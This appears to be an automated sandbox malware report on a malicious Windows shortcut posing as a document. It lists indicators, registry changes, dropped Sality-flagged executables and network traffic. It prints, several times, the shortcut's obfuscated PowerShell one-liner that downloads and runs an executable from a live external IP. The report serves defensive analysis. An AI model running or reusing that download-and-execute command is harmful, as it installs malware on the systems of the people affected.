inv2.doc.lnk
This report is generated from a file or URL submitted to this webservice on November 16th 2016 11:48:39 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.40 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
- Injects into explorer
- Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date - Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET INFO Executable Download from dotted-quad Host" (SID: 2016141, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 2/54 Antivirus vendors marked sample as malicious (3% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Contains ability to start/interact with device drivers
- details
- DeviceIoControl@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 8/10
-
The analysis extracted a file that was identified as malicious
- details
-
1/80 Antivirus vendors marked dropped file "System.dll" as malicious (classified as "W32.eHeur" with 1% detection rate)
13/57 Antivirus vendors marked dropped file "Roaming.exE" as malicious (classified as "virus.win32.sality" with 22% detection rate) - source
- Extracted File
- relevance
- 10/10
-
Contains ability to start/interact with device drivers
-
Installation/Persistance
-
Injects into explorer
- details
- Injected into "explorer.exe" (Show Process)
- source
- Monitored Target
- relevance
- 5/10
-
Injects into explorer
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "46.30.43.107" (ASN: 35415, Owner: Webazilla B.V.): ...
URL: http://46.30.43.107/gite.exe (AV positives: 8/68 scanned on 11/16/2016 08:13:36)
URL: http://46.30.43.107/ (AV positives: 5/68 scanned on 11/15/2016 21:13:26)
URL: http://46.30.43.107/gite.exe%20HTTP/1.1 (AV positives: 5/68 scanned on 11/15/2016 20:38:35)
URL: http://46.30.43.107/faf.hasa (AV positives: 11/68 scanned on 11/09/2016 17:50:45)
URL: http://46.30.43.107/gi2.exe (AV positives: 7/68 scanned on 11/04/2016 03:27:32)
File SHA256: 2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d (AV positives: 7/57 scanned on 11/16/2016 08:13:41)
File SHA256: 77aba6a5271267758116b508d6d2432278fa634f41f55cf3dfb6a66fd54d4074 (AV positives: 10/57 scanned on 11/15/2016 23:06:02)
File SHA256: 76fbbdd811bc0c3bd9260edf7b532857c47b95d432ab8bc52ebe57e1a7acd56d (AV positives: 1/53 scanned on 11/15/2016 20:38:39)
File SHA256: 74ea1a8baa20e22e4e485cab4900ec34eb94a267e31b3499c29f700fc9751468 (AV positives: 19/56 scanned on 11/15/2016 10:07:40)
File SHA256: efd9a49ccf1fa77ed5b5cd077b4bb3d62a6a0e0cc5c0accbcc6e74b70cbcf0a5 (AV positives: 8/56 scanned on 11/14/2016 09:55:30) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains ability to reboot/shutdown the operating system
- details
- ExitWindowsEx@USER32.DLL from exE (PID: 3592) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Contains native function calls
- details
-
NtFsControlFile@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
NtQueryInformationProcess@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
NtOpenThreadToken@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
NtQueryInformationToken@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Contains ability to reboot/shutdown the operating system
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 16
-
Anti-Detection/Stealthyness
-
Queries kernel debugger information
- details
- "exE" at 00022258-00003592-00000105-53501164
- source
- API Call
- relevance
- 6/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Queries kernel debugger information
-
Environment Awareness
-
Reads the cryptographic machine GUID
- details
-
"powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the windows installation date
- details
- "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source
- Registry Access
- relevance
- 10/10
-
Reads the cryptographic machine GUID
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO SUSPICIOUS Dotted Quad Host MZ Response" (SID: 2021076, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic" - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Reads configuration files
- details
-
"exE" read file "%USERPROFILE%\Users\PSPUBWS\Desktop\desktop.ini"
"exE" read file "%USERPROFILE%\Searches\desktop.ini"
"exE" read file "%USERPROFILE%\Videos\desktop.ini"
"exE" read file "%USERPROFILE%\Pictures\desktop.ini"
"exE" read file "%USERPROFILE%\Contacts\desktop.ini"
"exE" read file "%USERPROFILE%\Favorites\desktop.ini"
"exE" read file "%USERPROFILE%\Music\desktop.ini"
"exE" read file "%USERPROFILE%\Downloads\desktop.ini"
"exE" read file "%USERPROFILE%\Documents\desktop.ini" - source
- API Call
- relevance
- 4/10
-
Reads configuration files
-
Installation/Persistance
-
Drops executable files
- details
-
"System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive" - source
- Extracted File
- relevance
- 10/10
-
Writes a PE file header to disc
- details
- "exE" wrote 11776 bytes starting with PE header signature to file "%TEMP%\nsf7D51.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
- source
- API Call
- relevance
- 10/10
-
Drops executable files
-
Network Related
-
Found potential IP address in binary/memory
- details
-
Heuristic match: "exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
Heuristic match: "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE"
"46.30.43.107"
Heuristic match: "6.1.7601.17514"
Heuristic match: "/c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE""
Heuristic match: "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE" - source
- String
- relevance
- 3/10
-
Found potential IP address in binary/memory
-
Spyware/Information Retrieval
-
Contains ability to open the clipboard
- details
- OpenClipboard@USER32.DLL from exE (PID: 3592) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to open the clipboard
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"powershell.exe" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F011000" (part of module "SHFOLDER.DLL")
"powershell.exe" wrote bytes "f4f4ab70" to virtual address "0x6B1D1FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "7739807779a88477be728477d62d84771de27f7705a28477c868837757d18a77bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x75371000" (part of module "WSHIP6.DLL")
"powershell.exe" wrote bytes "92e67f7779a88477be728477d62d84771de27f7705a28477bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x74E51000" (part of module "WSHTCPIP.DLL")
"powershell.exe" wrote bytes "4053827758588377186a8377653c84770000000000bf5f770000000056cc5f77000000007cca5f77000000003768b6756a2c8477d62d8477000000002069b6750000000029a65f7700000000a48db67500000000f70e5f7700000000" to virtual address "0x75D01000" (part of module "NSI.DLL")
"exE" wrote bytes "4d376077f99c5f7778eb5e7718616177fa8b5e77d33360770e456077a41d6077d0d95f77e8d95f77013c6077e19c5f772b456077b62f607741235f7700bf5f77000000006d42747700000000ec227c7699e5797600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
"exE" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F021000" (part of module "SHFOLDER.DLL")
"exE" wrote bytes "c2000000" to virtual address "0x1000405C" (part of module "SYSTEM.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
- "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
- source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 16
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetLocalTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersion@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetVersion@KERNEL32.DLL from exE (PID: 3592) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
-
GetDiskFreeSpaceExW@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetDiskFreeSpaceW@KERNEL32.DLL from exE (PID: 3592) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 3/10
-
Makes a code branch decision directly after an API that is environment aware
- details
-
Found API call GetLocalTime@KERNEL32.DLL (Target: "cmd.exe"; Stream UID: "00019473-00003804-28473-452-4A00C53D")
which is directly followed by "cmp esi, ebx" and "jne 4A00C714h". See related instructions: "...
+435 lea eax, dword ptr [ebp-00000264h]
+441 push eax
+442 call dword ptr [49FF1324h] ;GetLocalTime
+448 lea eax, dword ptr [ebp-24h]
+451 push eax
+452 push edi
+453 lea eax, dword ptr [ebp-00000264h]
+459 push eax
+460 cmp esi, ebx
+462 jne 4A00C714h" ... from cmd.exe (PID: 3804) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
- "wimel.at"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "46.30.43.107:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
- "cmd.pdb"
- source
- String
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\Global\.net clr networking"
"\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
"\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "unternehmen.jsp" as clean (type is "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators")
- source
- Extracted File
- relevance
- 10/10
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 6A6D0000
- source
- Loaded Module
-
Spawns new processes
- details
-
Spawned process "powershell.exe" with commandline "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE" (Show Process)
Spawned process "exE" (Show Process)
Spawned process "explorer.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"O2C5X4FOXJSAPSMSRUYH.temp" has type "data"
"ext.default.css" has type "ASCII text"
"unternehmen.jsp" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"
"Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive"
"jquery.cycle2.tile.min.js" has type "ASCII text with very long lines with CRLF line terminators"
"ie179663103.css" has type "ASCII text"
"lang-en.js" has type "UTF-8 Unicode text"
"DK6uDL.QaY5YZv" has type "data" - source
- Extracted File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
- "cmd.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
- source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://46.30.43.107/gite.exe','%APPDATA%\exE"
Pattern match: "http://www.asdesigning.com"
Pattern match: "http://nsis.sf.net/NSIS_Error"
Pattern match: "http://www.astemplates.com"
Pattern match: "https://www.elo.com/wcm/unternehmen.jsp"
Pattern match: "ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"
Pattern match: "dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random()"
Pattern match: "http://www.elo.com"
Pattern match: "http://partner.elo.com/referenzfinder.html"
Pattern match: "https://partner.elo.com/elo-business-partner-finden.html"
Pattern match: "http://elooffice.elo.com/kaufen/fachhaendler.html"
Pattern match: "http://elooffice.elo.com/kaufen/distributoren.html"
Pattern match: "http://partner.elo.com/kooperationspartner.html"
Pattern match: "http://blog.elooffice.de"
Pattern match: "http://elooffice.elo.com/service/downloadcenter.html"
Pattern match: "https://elooffice.elo.com/service/schulungen.html"
Pattern match: "http://elooffice.elo.com/testversion.html"
Pattern match: "http://elo.com/wcm/de/unternehmen/kontakt"
Pattern match: "static.etracker.com/code/e.js" - source
- String
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
inv2.doc.lnk
- Filename
- inv2.doc.lnk
- Size
- 2.6KiB (2663 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon, Archive, ctime=Sat Nov 20 21:29:12 2010, mtime=Sat Nov 20 21:29:12 2010, atime=Sat Nov 20 21:29:12 2010, length=302592, window=hidenormalshowminimized
- Architecture
- WINDOWS
- SHA256
- 42afe1bfcf2ec48aa2fb293b637d8df2033504ec98fe5944167187f19899ddb4
- MD5
- 9d651569af586ad148be2df875acd0b7
- SHA1
- c454487e8765e4d8ccc463f8053d08a68cf8f812
Classification (TrID)
- 100.0% (.LNK) Windows Shortcut
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 4 processes in total (System Resource Monitor).
-
cmd.exe /c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE" (PID: 3804)
-
powershell.exe PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE (PID: 2612)
-
exE (PID: 3592)
-
explorer.exe (PID: 3276)
-
-
-
Network Analysis
Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
|
46.30.43.107 |
80
TCP |
powershell.exe PID: 2612 |
Russian Federation
ASN: 35415 (Webazilla B.V.) |
Contacted Countries
HTTP Traffic
| Endpoint | Request | URL | |
|---|---|---|---|
| 46.30.43.107:80 | GET | 46.30.43.107/gite.exe | GET /gite.exe HTTP/1.1 Host: 46.30.43.107 Connection: Keep-Alive |
Memory Forensics
| String | Context | Stream UID |
|---|---|---|
| http://46.30.43.107/gite.exe','c | Domain/IP reference | 00019473-00003804-28473-125-49FF4C09 |
Suricata Alerts
| Event | Category | Description | SID |
|---|---|---|---|
| local -> 46.30.43.107:80 (TCP) | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host | 2016141 |
| 46.30.43.107 -> local:57235 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
| 46.30.43.107 -> local:57235 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
| 46.30.43.107 -> local:57235 (TCP) | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response | 2021076 |
Extracted Strings
Extracted Files
-
Malicious 2
-
-
Roaming.exE
- Size
- 211KiB (215649 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
- AV Scan Result
- Labeled as "virus.win32.sality" (13/57)
- Runtime Process
- powershell.exe (PID: 2612)
- MD5
-
1ab0e4452a4feaa8c382cf2943023920
- SHA1
-
4a3103c29b54ddb4d83b0b2d2ad0846f4f275a92
- SHA256
-
2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d
-
System.dll
- Size
- 12KiB (11776 bytes)
- Type
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "W32.eHeur" (1/80)
- Runtime Process
- exE (PID: 3592)
- MD5
-
ca332bb753b0775d5e806e236ddcec55
- SHA1
-
f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f
- SHA256
-
df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d
-
-
Clean 1
-
-
unternehmen.jsp
- Size
- 13KiB (13141 bytes)
- Type
- HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
- AV Scan Result
- 0/55
- Runtime Process
- exE (PID: 3592)
- MD5
-
112e359c8f4faff029f0c2485f87776b
- SHA1
-
cc3789203b59f1a884985d6d8402ae4c34b13517
- SHA256
-
ec835ef3b1d41058f56eb92c8887e993f9a5a0ad84ab6977bf5b3e14590adad9
-
-
Informative 6
-
-
O2C5X4FOXJSAPSMSRUYH.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2612)
- MD5
-
21f9969362bbc202df0cbd6c4a8e50c9
- SHA1
-
62bc816d70453da6839e5457749c42e182fbcb39
- SHA256
-
18f4142318b5be465f5bdf6d5910d673f533e76c10c3acb22820571881d3f30d
-
DK6uDL.QaY5YZv
- Size
- 71KiB (72487 bytes)
- Type
- data
- Runtime Process
- exE (PID: 3592)
- MD5
-
dbaabb93f493426ddc8f11cd3b31edcc
- SHA1
-
6ecf83beeed303a0b2541a3df964354bdb57ae9b
- SHA256
-
55f134d02d953d0cbc5f014e768ebcb7fd7cff7050f3461de0755c4b082c6244
-
ext.default.css
- Size
- 5.9KiB (6068 bytes)
- Type
- ASCII text
- Runtime Process
- exE (PID: 3592)
- MD5
-
4680315c26479be48c58d7594310ce60
- SHA1
-
3e7868549a35780d7838047f3f5af3eddf81aea1
- SHA256
-
4cb2cd89886d1d11c90461c84533f230fa6d253562696c100a27d3c45681b55e
-
ie179663103.css
- Size
- 4.5KiB (4637 bytes)
- Type
- ASCII text
- Runtime Process
- exE (PID: 3592)
- MD5
-
58a2af1813aec98e3abfa061f6e41817
- SHA1
-
f0e3732d5f2fc6ac13a13d49bf361ef1f4a2f8d6
- SHA256
-
64b6cea996e39510103edf47c1613a38238b6f46f7ff8a1b009e45e5362311ac
-
jquery.cycle2.tile.min.js
- Size
- 1.9KiB (1957 bytes)
- Type
- ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- exE (PID: 3592)
- MD5
-
5cbfd30b5cd26645861bbc1be2a3f910
- SHA1
-
1d90411b6467d94ad8c7782d4c22255959d33bfb
- SHA256
-
c85b83d00c3730368ad004e6b28233c68f1de8cfcd3b4f0169c8ad206eb13327
-
lang-en.js
- Size
- 685B (685 bytes)
- Type
- UTF-8 Unicode text
- Runtime Process
- exE (PID: 3592)
- MD5
-
c1ed5be339c4b8ef8b1a36942a5e40bc
- SHA1
-
ee055c881a9d137d157fc61834c2e25ee1fb090c
- SHA256
-
967a7c6425de0d66d6bdf9be746724046b98720bebcb90bcddb96047d93c27ed
-
Russian Federation